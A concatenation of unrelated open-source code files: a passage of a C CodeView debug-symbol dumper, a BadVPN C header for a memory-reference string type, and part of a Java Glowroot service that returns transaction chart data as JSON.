sym->thunk_v3.segment, sym->thunk_v3.offset, sym->thunk_v3.thunk_len, sym->thunk_v3.thtype); curr_func = strdup(sym->thunk_v3.name); break; /* Global and static functions */ case S_GPROC_V1: case S_LPROC_V1: printf("\tS-%s-Proc V1: '%s' (%04x:%08x#%x) type:%x attr:%x\n", sym->generic.id == S_GPROC_V1 ? "Global" : "-Local", p_string(&sym->proc_v1.p_name), sym->proc_v1.segment, sym->proc_v1.offset, sym->proc_v1.proc_len, sym->proc_v1.proctype, sym->proc_v1.flags); printf("\t Debug: start=%08x end=%08x\n", sym->proc_v1.debug_start, sym->proc_v1.debug_end); if (nest_block) { printf(">>> prev func '%s' still has nest_block %u count\n", curr_func, nest_block); nest_block = 0; } curr_func = strdup(p_string(&sym->proc_v1.p_name)); /* EPP unsigned int pparent; */ /* EPP unsigned int pend; */ /* EPP unsigned int next; */ break; case S_GPROC_V2: case S_LPROC_V2: printf("\tS-%s-Proc V2: '%s' (%04x:%08x#%x) type:%x attr:%x\n", sym->generic.id == S_GPROC_V2 ? "Global" : "-Local", p_string(&sym->proc_v2.p_name), sym->proc_v2.segment, sym->proc_v2.offset, sym->proc_v2.proc_len, sym->proc_v2.proctype, sym->proc_v2.flags); printf("\t Debug: start=%08x end=%08x\n", sym->proc_v2.debug_start, sym->proc_v2.debug_end); if (nest_block) { printf(">>> prev func '%s' still has nest_block %u count\n", curr_func, nest_block); nest_block = 0; } curr_func = strdup(p_string(&sym->proc_v2.p_name)); /* EPP unsigned int pparent; */ /* EPP unsigned int pend; */ /* EPP unsigned int next; */ break; case S_LPROC_V3: case S_GPROC_V3: printf("\tS-%s-Procedure V3 '%s' (%04x:%08x#%x) type:%x attr:%x\n", sym->generic.id == S_GPROC_V3 ? "Global" : "Local", sym->proc_v3.name, sym->proc_v3.segment, sym->proc_v3.offset, sym->proc_v3.proc_len, sym->proc_v3.proctype, sym->proc_v3.flags); printf("\t Debug: start=%08x end=%08x\n", sym->proc_v3.debug_start, sym->proc_v3.debug_end); if (nest_block) { printf(">>> prev func '%s' still has nest_block %u count\n", curr_func, nest_block); nest_block = 0; } curr_func = strdup(sym->proc_v3.name); /* EPP unsigned int pparent; */ /* EPP unsigned int pend; */ /* EPP unsigned int next; */ break; /* Function parameters and stack variables */ case S_BPREL_V1: printf("\tS-BP-relative V1: '%s' @%d type:%x (%s)\n", p_string(&sym->stack_v1.p_name), sym->stack_v1.offset, sym->stack_v1.symtype, curr_func); break; case S_BPREL_V2: printf("\tS-BP-relative V2: '%s' @%d type:%x (%s)\n", p_string(&sym->stack_v2.p_name), sym->stack_v2.offset, sym->stack_v2.symtype, curr_func); break; case S_BPREL_V3: printf("\tS-BP-relative V3: '%s' @%d type:%x (in %s)\n", sym->stack_v3.name, sym->stack_v3.offset, sym->stack_v3.symtype, curr_func); break; case S_REGREL_V3: printf("\tS-Reg-relative V3: '%s' @%d type:%x reg:%x (in %s)\n", sym->regrel_v3.name, sym->regrel_v3.offset, sym->regrel_v3.symtype, sym->regrel_v3.reg, curr_func); break; case S_REGISTER_V1: printf("\tS-Register V1 '%s' in %s type:%x register:%x\n", p_string(&sym->register_v1.p_name), curr_func, sym->register_v1.reg, sym->register_v1.type); break; case S_REGISTER_V2: printf("\tS-Register V2 '%s' in %s type:%x register:%x\n", p_string(&sym->register_v2.p_name), curr_func, sym->register_v2.reg, sym->register_v2.type); break; case S_REGISTER_V3: printf("\tS-Register V3 '%s' in %s type:%x register:%x\n", sym->register_v3.name, curr_func, sym->register_v3.reg, sym->register_v3.type); break; case S_BLOCK_V1: printf("\tS-Block V1 '%s' in '%s' (%04x:%08x#%08x)\n", p_string(&sym->block_v1.p_name), curr_func, sym->block_v1.segment, sym->block_v1.offset, sym->block_v1.length); nest_block++; break; case S_BLOCK_V3: printf("\tS-Block V3 '%s' in '%s' (%04x:%08x#%08x) parent:%u end:%x\n", sym->block_v3.name, curr_func, sym->block_v3.segment, sym->block_v3.offset, sym->block_v3.length, sym->block_v3.parent, sym->block_v3.end); nest_block++; break; /* Additional function information */ case S_FRAMEINFO_V2: printf("\tS-Frame-Info V2: frame-size:%x unk2:%x unk3:%x saved-regs-sz:%x eh(%04x:%08x) flags:%08x\n", sym->frame_info_v2.sz_frame, sym->frame_info_v2.unknown2, sym->frame_info_v2.unknown3, sym->frame_info_v2.sz_saved_regs, sym->frame_info_v2.eh_sect, sym->frame_info_v2.eh_offset, sym->frame_info_v2.flags); break; case S_SECUCOOKIE_V3: printf("\tSecurity Cookie V3 @%d unk:%x\n", sym->security_cookie_v3.offset, sym->security_cookie_v3.unknown); break; case S_END_V1: if (nest_block) { nest_block--; printf("\tS-End-Of block (%u)\n", nest_block); } else { printf("\tS-End-Of %s\n", curr_func); free(curr_func); curr_func = NULL; } break; case S_COMPILAND_V1: { const char* machine; const char* lang; switch (sym->compiland_v1.unknown & 0xFF) { case 0x00: machine = "Intel 8080"; break; case 0x01: machine = "Intel 8086"; break; case 0x02: machine = "Intel 80286"; break; case 0x03: machine = "Intel 80386"; break; case 0x04: machine = "Intel 80486"; break; case 0x05: machine = "Intel Pentium"; break; case 0x10: machine = "MIPS R4000"; break; default: { static char tmp[16]; sprintf(tmp, "machine=%x", sym->compiland_v1.unknown & 0xFF); machine = tmp; } break; } switch ((sym->compiland_v1.unknown >> 8) & 0xFF) { case 0x00: lang = "C"; break; case 0x01: lang = "C++"; break; case 0x02: lang = "Fortran"; break; case 0x03: lang = "Masm"; break; case 0x04: lang = "Pascal"; break; case 0x05: lang = "Basic"; break; case 0x06: lang = "Cobol"; break; default: { static char tmp[16]; sprintf(tmp, "language=%x", (sym->compiland_v1.unknown >> 8) & 0xFF); lang = tmp; } break; } printf("\tS-Compiland V1 '%s' %s %s unk:%x\n", p_string(&sym->compiland_v1.p_name), machine, lang, sym->compiland_v1.unknown >> 16); } break; case S_COMPILAND_V2: printf("\tS-Compiland V2 '%s'\n", p_string(&sym->compiland_v2.p_name)); dump_data((const void*)sym, sym->generic.len + 2, " "); { const char* ptr = sym->compiland_v2.p_name.name + sym->compiland_v2.p_name.namelen; while (*ptr) { printf("\t\t%s => ", ptr); ptr += strlen(ptr) + 1; printf("%s\n", ptr); ptr += strlen(ptr) + 1; } } break; case S_COMPILAND_V3: printf("\tS-Compiland V3 '%s' unknown:%x\n", sym->compiland_v3.name, sym->compiland_v3.unknown); break; case S_OBJNAME_V1: printf("\tS-ObjName V1 sig:%.4s '%s'\n", sym->objname_v1.signature, p_string(&sym->objname_v1.p_name)); break; case S_LABEL_V1: printf("\tS-Label V1 '%s' in '%s' (%04x:%08x)\n", p_string(&sym->label_v1.p_name), curr_func, sym->label_v1.segment, sym->label_v1.offset); break; case S_LABEL_V3: printf("\tS-Label V3 '%s' in '%s' (%04x:%08x) flag:%x\n", sym->label_v3.name, curr_func, sym->label_v3.segment, sym->label_v3.offset, sym->label_v3.flags); break; case S_CONSTANT_V2: { int vlen; struct full_value fv; vlen = full_numeric_leaf(&fv, &sym->constant_v2.cvalue); printf("\tS-Constant V2 '%s' = %s type:%x\n", p_string(PSTRING(&sym->constant_v2.cvalue, vlen)), full_value_string(&fv), sym->constant_v2.type); } break; case S_CONSTANT_V3: { int vlen; struct full_value fv; vlen = full_numeric_leaf(&fv, &sym->constant_v3.cvalue); printf("\tS-Constant V3 '%s' = %s type:%x\n", (const char*)&sym->constant_v3.cvalue + vlen, full_value_string(&fv), sym->constant_v3.type); } break; case S_UDT_V1: printf("\tS-Udt V1 '%s': type:0x%x\n", p_string(&sym->udt_v1.p_name), sym->udt_v1.type); break; case S_UDT_V2: printf("\tS-Udt V2 '%s': type:0x%x\n", p_string(&sym->udt_v2.p_name), sym->udt_v2.type); break; case S_UDT_V3: printf("\tS-Udt V3 '%s': type:0x%x\n", sym->udt_v3.name, sym->udt_v3.type); break; /* * These are special, in that they are always followed by an * additional length-prefixed string which is *not* included * into the symbol length count. We need to skip it. */ case S_PROCREF_V1: printf("\tS-Procref V1 "); goto doaref; case S_DATAREF_V1: printf("\tS-Dataref V1 "); goto doaref; case S_LPROCREF_V1: printf("\tS-L-Procref V1 "); goto doaref; doaref: { const struct p_string* pname; pname = PSTRING(sym, length); length += (pname->namelen + 1 + 3) & ~3; printf("\t%08x %08x %08x '%s'\n", *(((const DWORD*)sym) + 1), *(((const DWORD*)sym) + 2), *(((const DWORD*)sym) + 3), p_string(pname)); } break; case S_MSTOOL_V3: /* info about tool used to create CU */ { const unsigned short* ptr = ((const unsigned short*)sym) + 2; const char* x1; const char* x2 = (const char*)&ptr[9]; /* FIXME: what are all those values for ? */ printf("\tTool V3 unk=%04x%04x%04x front=%d.%d.%d.0 back=%d.%d.%d.0 %s\n", ptr[0], ptr[1], ptr[2], ptr[3], ptr[4], ptr[5], ptr[6], ptr[7], ptr[8], x2); while (*(x1 = x2 + strlen(x2) + 1)) { x2 = x1 + strlen(x1) + 1; if (!*x2) break; printf("\t\t%s: %s\n", x1, x2); } } break; case S_MSTOOLINFO_V3: { const unsigned short* ptr = ((const unsigned short*)sym) + 2; printf("\tTool info V3: unk=%04x%04x%04x front=%d.%d.%d.%d back=%d.%d.%d.%d %s\n", ptr[0], ptr[1], ptr[2], ptr[3], ptr[4], ptr[5], ptr[6], ptr[7], ptr[8], ptr[9], ptr[10], (const char*)(ptr + 11)); } break; case S_MSTOOLENV_V3: { const char* x1 = (const char*)sym + 4 + 1; const char* x2; printf("\tTool conf V3\n"); while (*x1) { x2 = x1 + strlen(x1) + 1; if (!*x2) break; printf("\t\t%s: %s\n", x1, x2); x1 = x2 + strlen(x2) + 1; } } break; case S_ALIGN_V1: /* simply skip it */ break; case S_SSEARCH_V1: printf("\tSSearch V1: (%04x:%08x)\n", sym->ssearch_v1.segment, sym->ssearch_v1.offset); break; case S_SECTINFO_V3: printf("\tSSection Info: seg=%04x ?=%04x rva=%08x size=%08x attr=%08x %s\n", *(const unsigned short*)((const char*)sym + 4), *(const unsigned short*)((const char*)sym + 6), *(const unsigned*)((const char*)sym + 8), *(const unsigned*)((const char*)sym + 12), *(const unsigned*)((const char*)sym + 16), (const char*)sym + 20); break; case S_SUBSECTINFO_V3: printf("\tSSubSection Info: addr=%04x:%08x size=%08x attr=%08x %s\n", *(const unsigned short*)((const char*)sym + 16), *(const unsigned*)((const char*)sym + 12), *(const unsigned*)((const char*)sym + 4), *(const unsigned*)((const char*)sym + 8), (const char*)sym + 18); break; case S_ENTRYPOINT_V3: printf("\tSEntryPoint: id=%x '%s'\n", *(const unsigned*)((const char*)sym + 4), (const char*)sym + 8); break; case S_LTHREAD_V1: case S_GTHREAD_V1: printf("\tS-Thread %s Var V1 '%s' seg=%04x offset=%08x type=%x\n", sym->generic.id == S_LTHREAD_V1 ? "global" : "local", p_string(&sym->thread_v1.p_name), sym->thread_v1.segment, sym->thread_v1.offset, sym->thread_v1.symtype); break; case S_LTHREAD_V2: case S_GTHREAD_V2: printf("\tS-Thread %s Var V2 '%s' seg=%04x offset=%08x type=%x\n", sym->generic.id == S_LTHREAD_V2 ? "global" : "local", p_string(&sym->thread_v2.p_name), sym->thread_v2.segment, sym->thread_v2.offset, sym->thread_v2.symtype); break; case S_LTHREAD_V3: case S_GTHREAD_V3: printf("\tS-Thread %s Var V3 '%s' seg=%04x offset=%08x type=%x\n", sym->generic.id == S_LTHREAD_V3 ? "global" : "local", sym->thread_v3.name, sym->thread_v3.segment, sym->thread_v3.offset, sym->thread_v3.symtype); break; default: printf(">>> Unsupported symbol-id %x sz=%d\n", sym->generic.id, sym->generic.len + 2); dump_data((const void*)sym, sym->generic.len + 2, " "); } } return TRUE; } void codeview_dump_linetab(const char* linetab, BOOL pascal_str, const char* pfx) { const char* ptr = linetab; int nfile, nseg, nline; int i, j, k; const unsigned int* filetab; const unsigned int* lt_ptr; const struct startend* start; nfile = *(const short*)linetab; filetab = (const unsigned int*)(linetab + 2 * sizeof(short)); printf("%s%d files with %d ???\n", pfx, nfile, *(const short*)(linetab + sizeof(short))); for (i = 0; i < nfile; i++) { ptr = linetab + filetab[i]; nseg = *(const short*)ptr; ptr += 2 * sizeof(short); lt_ptr = (const unsigned int*)ptr; start = (const struct startend*)(lt_ptr + nseg); /* * Now snarf the filename for all of the segments for this file. */ if (pascal_str) { char filename[MAX_PATH]; const struct p_string* p_fn; p_fn = (const struct p_string*)(start + nseg); memset(filename, 0, sizeof(filename)); memcpy(filename, p_fn->name, p_fn->namelen); printf("%slines for file #%d/%d %s %d\n", pfx, i, nfile, filename, nseg); } else printf("%slines for file #%d/%d %s %d\n", pfx, i, nfile, (const char*)(start + nseg), nseg); for (j = 0; j < nseg; j++) { ptr = linetab + *lt_ptr++; nline = *(const short*)(ptr + 2); printf("%s %04x:%08x-%08x #%d\n", pfx, *(const short*)(ptr + 0), start[j].start, start[j].end, nline); ptr += 4; for (k = 0; k < nline; k++) { printf("%s %x %d\n", pfx, ((const unsigned int*)ptr)[k], ((const unsigned short*)((const unsigned int*)ptr + nline))[k]); } } } } void codeview_dump_linetab2(const char* linetab, DWORD size, const char* strimage, DWORD strsize, const char* pfx) { unsigned i; const struct codeview_linetab2* lt2; const struct codeview_linetab2* lt2_files = NULL; const struct codeview_lt2blk_lines* lines_blk; const struct codeview_linetab2_file*fd; /* locate LT2_FILES_BLOCK (if any) */ lt2 = (const struct codeview_linetab2*)linetab; while ((const char*)(lt2 + 1) < linetab + size) { if (lt2->header == LT2_FILES_BLOCK) { lt2_files = lt2; break; } lt2 = codeview_linetab2_next_block(lt2); } if (!lt2_files) { printf("%sNo LT2_FILES_BLOCK found\n", pfx); return; } lt2 = (const struct codeview_linetab2*)linetab; while ((const char*)(lt2 + 1) < linetab + size) { /* FIXME: should also check that whole lbh fits in linetab + size */ switch (lt2->header) { case LT2_LINES_BLOCK: lines_blk = (const struct codeview_lt2blk_lines*)lt2; printf("%sblock from %04x:%08x #%x (%x lines) fo=%x\n", pfx, lines_blk->seg, lines_blk->start, lines_blk->size, lines_blk->nlines, lines_blk->file_offset); /* FIXME: should check that file_offset is within the LT2_FILES_BLOCK we've seen */ fd = (const struct codeview_linetab2_file*)((const char*)lt2_files + 8 + lines_blk->file_offset); printf("%s md5=%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x\n", pfx, fd->md5[ 0], fd->md5[ 1], fd->md5[ 2], fd->md5[ 3], fd->md5[ 4], fd->md5[ 5], fd->md5[ 6], fd->md5[ 7], fd->md5[ 8], fd->md5[ 9], fd->md5[10], fd->md5[11], fd->md5[12], fd->md5[13], fd->md5[14], fd->md5[15]); /* FIXME: should check that string is within strimage + strsize */ printf("%s file=%s\n", pfx, strimage ? strimage + fd->offset : "--none--"); for (i = 0; i < lines_blk->nlines; i++) { printf("%s offset=%08x line=%d\n", pfx, lines_blk->l[i].offset, lines_blk->l[i].lineno ^ 0x80000000); } break; case LT2_FILES_BLOCK: /* skip */ break; default: printf("%sblock end %x\n", pfx, lt2->header); lt2 = (const struct codeview_linetab2*)(linetab + size); continue; } lt2 = codeview_linetab2_next_block(lt2); } }
31,790
1,759
<gh_stars>1000+ /** * @file memref.h * @author <NAME> <<EMAIL>> * * @section LICENSE * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the author nor the * names of its contributors may be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef BADVPN_MEMREF_H #define BADVPN_MEMREF_H #include <stddef.h> #include <string.h> #include <limits.h> #include <misc/debug.h> #include <misc/balloc.h> #include <misc/strdup.h> typedef struct { char const *ptr; size_t len; } MemRef; static MemRef MemRef_Make (char const *ptr, size_t len); static MemRef MemRef_MakeCstr (char const *ptr); static char MemRef_At (MemRef o, size_t pos); static void MemRef_AssertRange (MemRef o, size_t offset, size_t length); static MemRef MemRef_SubFrom (MemRef o, size_t offset); static MemRef MemRef_SubTo (MemRef o, size_t length); static MemRef MemRef_Sub (MemRef o, size_t offset, size_t length); static char * MemRef_StrDup (MemRef o); static void MemRef_CopyOut (MemRef o, char *out); static int MemRef_Equal (MemRef o, MemRef other); static int MemRef_FindChar (MemRef o, char ch, size_t *out_index); #define MEMREF_LOOP_CHARS__BODY(char_rel_pos_var, char_var, body) \ { \ for (size_t char_rel_pos_var = 0; char_rel_pos_var < MemRef__Loop_length; char_rel_pos_var++) { \ char char_var = MemRef__Loop_o.ptr[MemRef__Loop_offset + char_rel_pos_var]; \ { body } \ } \ } #define MEMREF_LOOP_CHARS_RANGE(o, offset, length, char_rel_pos_var, char_var, body) \ { \ MemRef MemRef__Loop_o = (o); \ size_t MemRef__Loop_offset = (offset); \ size_t MemRef__Loop_length = (length); \ MEMREF_LOOP_CHARS__BODY(char_rel_pos_var, char_var, body) \ } #define MEMREF_LOOP_CHARS(o, char_rel_pos_var, char_var, body) \ { \ MemRef MemRef__Loop_o = (o); \ size_t MemRef__Loop_offset = 0; \ size_t MemRef__Loop_length = MemRef__Loop_o.len; \ MEMREF_LOOP_CHARS__BODY(char_rel_pos_var, char_var, body) \ } // static MemRef MemRef_Make (char const *ptr, size_t len) { MemRef res; res.ptr = ptr; res.len = len; return res; } static MemRef MemRef_MakeCstr (char const *ptr) { ASSERT(ptr) return MemRef_Make(ptr, strlen(ptr)); } static char MemRef_At (MemRef o, size_t pos) { ASSERT(o.ptr) ASSERT(pos < o.len) return o.ptr[pos]; } static void MemRef_AssertRange (MemRef o, size_t offset, size_t length) { ASSERT(offset <= o.len) ASSERT(length <= o.len - offset) } static MemRef MemRef_SubFrom (MemRef o, size_t offset) { ASSERT(o.ptr) ASSERT(offset <= o.len) return MemRef_Make(o.ptr + offset, o.len - offset); } static MemRef MemRef_SubTo (MemRef o, size_t length) { ASSERT(o.ptr) ASSERT(length <= o.len) return MemRef_Make(o.ptr, length); } static MemRef MemRef_Sub (MemRef o, size_t offset, size_t length) { ASSERT(o.ptr) MemRef_AssertRange(o, offset, length); return MemRef_Make(o.ptr + offset, length); } static char * MemRef_StrDup (MemRef o) { ASSERT(o.ptr) return b_strdup_bin(o.ptr, o.len); } static void MemRef_CopyOut (MemRef o, char *out) { ASSERT(o.ptr) ASSERT(out) memcpy(out, o.ptr, o.len); } static int MemRef_Equal (MemRef o, MemRef other) { ASSERT(o.ptr) ASSERT(other.ptr) return (o.len == other.len) && !memcmp(o.ptr, other.ptr, o.len); } static int MemRef_FindChar (MemRef o, char ch, size_t *out_index) { ASSERT(o.ptr) for (size_t i = 0; i < o.len; i++) { if (o.ptr[i] == ch) { if (out_index) { *out_index = i; } return 1; } } return 0; } #endif
1,994
1,018
/* * Copyright 2011-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.glowroot.ui; import java.util.Collections; import java.util.Comparator; import java.util.HashMap; import java.util.List; import java.util.Map; import com.fasterxml.jackson.core.JsonGenerator; import com.fasterxml.jackson.databind.ObjectMapper; import com.google.common.base.Function; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.common.collect.Lists; import com.google.common.collect.Maps; import com.google.common.collect.Ordering; import com.google.common.io.CharStreams; import com.google.common.primitives.Doubles; import org.checkerframework.checker.nullness.qual.Nullable; import org.immutables.value.Value; import org.glowroot.common.live.ImmutableAggregateQuery; import org.glowroot.common.live.ImmutableSummaryQuery; import org.glowroot.common.live.LiveAggregateRepository.AggregateQuery; import org.glowroot.common.live.LiveAggregateRepository.OverviewAggregate; import org.glowroot.common.live.LiveAggregateRepository.PercentileAggregate; import org.glowroot.common.live.LiveAggregateRepository.SummaryQuery; import org.glowroot.common.live.LiveAggregateRepository.ThroughputAggregate; import org.glowroot.common.model.ImmutableOverallSummary; import org.glowroot.common.model.LazyHistogram; import org.glowroot.common.model.MutableProfile; import org.glowroot.common.model.MutableQuery; import org.glowroot.common.model.MutableServiceCall; import org.glowroot.common.model.OverallSummaryCollector; import org.glowroot.common.model.OverallSummaryCollector.OverallSummary; import org.glowroot.common.model.ProfileCollector; import org.glowroot.common.model.QueryCollector; import org.glowroot.common.model.Result; import org.glowroot.common.model.ServiceCallCollector; import org.glowroot.common.model.TransactionNameSummaryCollector.SummarySortOrder; import org.glowroot.common.model.TransactionNameSummaryCollector.TransactionNameSummary; import org.glowroot.common.util.CaptureTimes; import org.glowroot.common.util.Clock; import org.glowroot.common.util.ObjectMappers; import org.glowroot.common2.repo.AggregateRepository; import org.glowroot.common2.repo.ConfigRepository; import org.glowroot.common2.repo.ConfigRepository.RollupConfig; import org.glowroot.common2.repo.Utils; import org.glowroot.common2.repo.util.RollupLevelService; import org.glowroot.common2.repo.util.RollupLevelService.DataKind; import org.glowroot.ui.AggregateMerging.MergedAggregate; import org.glowroot.ui.AggregateMerging.PercentileValue; import org.glowroot.wire.api.model.AggregateOuterClass.Aggregate; import org.glowroot.wire.api.model.ProfileOuterClass.Profile; import static com.google.common.base.Preconditions.checkNotNull; @JsonService class TransactionJsonService { private static final double NANOSECONDS_PER_MILLISECOND = 1000000.0; private static final ObjectMapper mapper = ObjectMappers.create(); private final TransactionCommonService transactionCommonService; private final TraceCommonService traceCommonService; private final AggregateRepository aggregateRepository; private final ConfigRepository configRepository; private final RollupLevelService rollupLevelService; private final Clock clock; TransactionJsonService(TransactionCommonService transactionCommonService, TraceCommonService traceCommonService, AggregateRepository aggregateRepository, ConfigRepository configRepository, RollupLevelService rollupLevelService, Clock clock) { this.transactionCommonService = transactionCommonService; this.traceCommonService = traceCommonService; this.aggregateRepository = aggregateRepository; this.configRepository = configRepository; this.rollupLevelService = rollupLevelService; this.clock = clock; } @GET(path = "/backend/transaction/average", permission = "agent:transaction:overview") String getOverview(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { AggregateQuery query = toChartQuery(request, DataKind.GENERAL); long liveCaptureTime = clock.currentTimeMillis(); List<OverviewAggregate> overviewAggregates = transactionCommonService.getOverviewAggregates(agentRollupId, query, autoRefresh); if (overviewAggregates.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); overviewAggregates = transactionCommonService.getOverviewAggregates(agentRollupId, query, autoRefresh); if (!overviewAggregates.isEmpty() && ignoreFallBackData(query, Iterables.getLast(overviewAggregates).captureTime())) { // this is probably data from before the requested time period overviewAggregates = ImmutableList.of(); } } long dataPointIntervalMillis = configRepository.getRollupConfigs().get(query.rollupLevel()).intervalMillis(); List<DataSeries> dataSeriesList = getDataSeriesForTimerChart(request, overviewAggregates, dataPointIntervalMillis, liveCaptureTime); Map<Long, Long> transactionCounts = getTransactionCounts(overviewAggregates); // TODO more precise aggregate when from/to not on rollup grid List<OverviewAggregate> overviewAggregatesForMerging = Lists.newArrayList(); for (OverviewAggregate overviewAggregate : overviewAggregates) { long captureTime = overviewAggregate.captureTime(); if (captureTime > request.from() && captureTime <= request.to()) { overviewAggregatesForMerging.add(overviewAggregate); } } MergedAggregate mergedAggregate = AggregateMerging.getMergedAggregate(overviewAggregatesForMerging); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("dataSeries", dataSeriesList); jg.writeNumberField("dataPointIntervalMillis", dataPointIntervalMillis); jg.writeObjectField("transactionCounts", transactionCounts); jg.writeObjectField("mergedAggregate", mergedAggregate); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/percentiles", permission = "agent:transaction:overview") String getPercentiles(@BindAgentRollupId String agentRollupId, @BindRequest TransactionPercentileRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { AggregateQuery query = toChartQuery(request, DataKind.GENERAL); long liveCaptureTime = clock.currentTimeMillis(); List<PercentileAggregate> percentileAggregates = transactionCommonService.getPercentileAggregates(agentRollupId, query, autoRefresh); if (percentileAggregates.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); percentileAggregates = transactionCommonService.getPercentileAggregates(agentRollupId, query, autoRefresh); if (!percentileAggregates.isEmpty() && ignoreFallBackData(query, Iterables.getLast(percentileAggregates).captureTime())) { // this is probably data from before the requested time period percentileAggregates = ImmutableList.of(); } } long dataPointIntervalMillis = configRepository.getRollupConfigs().get(query.rollupLevel()).intervalMillis(); PercentileData percentileData = getDataSeriesForPercentileChart(request, percentileAggregates, request.percentile(), dataPointIntervalMillis, liveCaptureTime); Map<Long, Long> transactionCounts = getTransactionCounts2(percentileAggregates); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("dataSeries", percentileData.dataSeriesList()); jg.writeNumberField("dataPointIntervalMillis", dataPointIntervalMillis); jg.writeObjectField("transactionCounts", transactionCounts); jg.writeObjectField("mergedAggregate", percentileData.mergedAggregate()); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/throughput", permission = "agent:transaction:overview") String getThroughput(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { AggregateQuery query = toChartQuery(request, DataKind.GENERAL); long liveCaptureTime = clock.currentTimeMillis(); List<ThroughputAggregate> throughputAggregates = transactionCommonService.getThroughputAggregates(agentRollupId, query, autoRefresh); if (throughputAggregates.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); throughputAggregates = transactionCommonService.getThroughputAggregates(agentRollupId, query, autoRefresh); if (!throughputAggregates.isEmpty() && ignoreFallBackData(query, Iterables.getLast(throughputAggregates).captureTime())) { // this is probably data from before the requested time period throughputAggregates = ImmutableList.of(); } } long dataPointIntervalMillis = configRepository.getRollupConfigs().get(query.rollupLevel()).intervalMillis(); List<DataSeries> dataSeriesList = getDataSeriesForThroughputChart(request, throughputAggregates, dataPointIntervalMillis, liveCaptureTime); // TODO more precise aggregate when from/to not on rollup grid long transactionCount = 0; for (ThroughputAggregate throughputAggregate : throughputAggregates) { long captureTime = throughputAggregate.captureTime(); if (captureTime > request.from() && captureTime <= request.to()) { transactionCount += throughputAggregate.transactionCount(); } } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("dataSeries", dataSeriesList); jg.writeNumberField("dataPointIntervalMillis", dataPointIntervalMillis); jg.writeNumberField("transactionCount", transactionCount); jg.writeNumberField("transactionsPerMin", 60000.0 * transactionCount / (request.to() - request.from())); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/queries", permission = "agent:transaction:queries") String getQueries(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.QUERY); QueryCollector queryCollector = transactionCommonService.getMergedQueries(agentRollupId, query); List<MutableQuery> queries = queryCollector.getSortedAndTruncatedQueries(); if (queries.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); queryCollector = transactionCommonService.getMergedQueries(agentRollupId, query); queries = queryCollector.getSortedAndTruncatedQueries(); if (ignoreFallBackData(query, queryCollector.getLastCaptureTime())) { // this is probably data from before the requested time period queries = ImmutableList.of(); } } List<Query> queryList = Lists.newArrayList(); for (MutableQuery loopQuery : queries) { queryList.add(ImmutableQuery.builder() .queryType(loopQuery.getType()) .truncatedQueryText(loopQuery.getTruncatedText()) .fullQueryTextSha1(loopQuery.getFullTextSha1()) .totalDurationNanos(loopQuery.getTotalDurationNanos()) .executionCount(loopQuery.getExecutionCount()) .totalRows(loopQuery.hasTotalRows() ? loopQuery.getTotalRows() : null) .build()); } if (queryList.isEmpty() && aggregateRepository.shouldHaveQueries(agentRollupId, query)) { return "{\"overwritten\":true}"; } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeObject(queryList); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/full-query-text", permission = "agent:transaction:queries") String 